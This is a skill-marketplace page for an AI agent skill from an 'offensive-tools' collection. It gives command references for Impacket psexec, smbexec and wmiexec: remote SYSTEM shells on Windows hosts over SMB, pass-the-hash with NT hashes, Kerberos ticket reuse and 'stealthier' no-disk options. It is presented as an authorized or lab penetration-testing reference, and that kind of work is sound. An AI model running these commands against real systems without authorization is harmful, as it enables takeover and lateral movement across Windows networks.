aeondave/psexec
offensive-tools/windows/psexec/SKILL.md
Auth/lab ref: Impacket psexec for remote SYSTEM-level shell execution on Windows hosts via SMB.
$ install --global
skillsauthnpx skillsauth add aeondave/malskill psexecInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
Security Scan Results
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
3
Scanners Passed
9
Scanners in report
Clean
TrivyContainer and dependency vulnerability scanner
95%
Clean
SemgrepStatic code analysis for vulnerabilities
95%
Clean
mcp-scan (Snyk)Model Context Protocol security validation
95%
Skipped
Snyk (dep)Open source security scanning
50%
Skipped
Socket.devSupply chain security analysis
50%
Skipped
VirusTotalMulti-engine malware detection
50%
Skipped
CrowdStrikeAdvanced threat intelligence
50%
Skipped
OSV-ScannerOpen Source Vulnerability database check
50%
Skipped
OWASP Dep-Check
50%
Last scanned: Jun 9, 2026, 4:05 AM35.9s1 file scanned
SKILL.md
- name:
- psexec
- description:
- Auth/lab ref: Impacket psexec for remote SYSTEM-level shell execution on Windows hosts via SMB.
- license:
- Apache-2.0
- compatibility:
- Linux, macOS, Windows.
- author:
- AeonDave
- version:
- 1.0
psexec (impacket)
Remote SYSTEM shell via SMB — part of the impacket suite. Creates a service, uploads a remote shell binary to ADMIN$, and executes it.
Quick Start
# Password auth
impacket-psexec domain/user:[email protected]
# Pass-the-hash
impacket-psexec [email protected] -hashes :8846f7eaee8fb117ad06bdd830b7586c
# Local account
impacket-psexec WORKGROUP/administrator:[email protected]
Core Flags
| Flag | Description |
|------|-------------|
| domain/user:pass@target | Standard auth string |
| -hashes <LM:NT> | Pass-the-hash (use :NT for NT only) |
| -no-pass | No password (for null sessions) |
| -k | Kerberos auth |
| -dc-ip <ip> | Domain controller IP |
| -port <n> | Custom SMB port |
| -service-name <n> | Custom service name (default random) |
| -remote-binary-name <n> | Custom remote binary name |
| -shell-type <type> | Shell type: cmd or powershell |
| -codec <enc> | Output encoding (default auto-detect) |
Impacket Execution Alternatives
| Tool | Method | Notes |
|------|--------|-------|
| psexec.py | Service + ADMIN$ binary | SYSTEM shell; noisy (creates service) |
| smbexec.py | Service + cmd.exe | No binary drop; semi-interactive |
| wmiexec.py | WMI + cmd.exe | Semi-interactive; no service created |
| atexec.py | Task Scheduler | Single command; no interactive shell |
| dcomexec.py | DCOM | Multiple DCOM object options |
Common Workflows
# Get SYSTEM shell with credentials
impacket-psexec corp.local/admin:[email protected]
# Pass-the-hash (no LM needed for modern Windows)
impacket-psexec -hashes :f6f38b793db6a78dc379eee9e56b8c91 [email protected]
# PowerShell shell
impacket-psexec admin:[email protected] -shell-type powershell
# Execute single command (use wmiexec for non-interactive)
impacket-wmiexec admin:[email protected] "net user"
# Stealthier: smbexec (no binary to disk)
impacket-smbexec admin:[email protected]
# Kerberos auth (with CCACHE)
export KRB5CCNAME=/tmp/admin.ccache
impacket-psexec -k -no-pass corp.local/[email protected]
Resources
| File | When to load |
|------|--------------|
| references/impacket-suite.md | Full impacket tool reference, secretsdump, GetUserSPNs, ticketing attacks |
Structuring This Skill
Related Skills
aeondave/vibe-audit-technique
development
VerifiedTrustedCommunity
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
4SKILL.mdUpdated Jun 12, 2026
aeondave/source-review-technique
development
VerifiedTrustedCommunity
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
4SKILL.mdUpdated Jun 12, 2026
aeondave/hardware-technique
development
VerifiedTrustedCommunity
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
4SKILL.mdUpdated Jun 12, 2026
aeondave/container-technique
devops
VerifiedTrustedCommunity
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.
4SKILL.mdUpdated Jun 12, 2026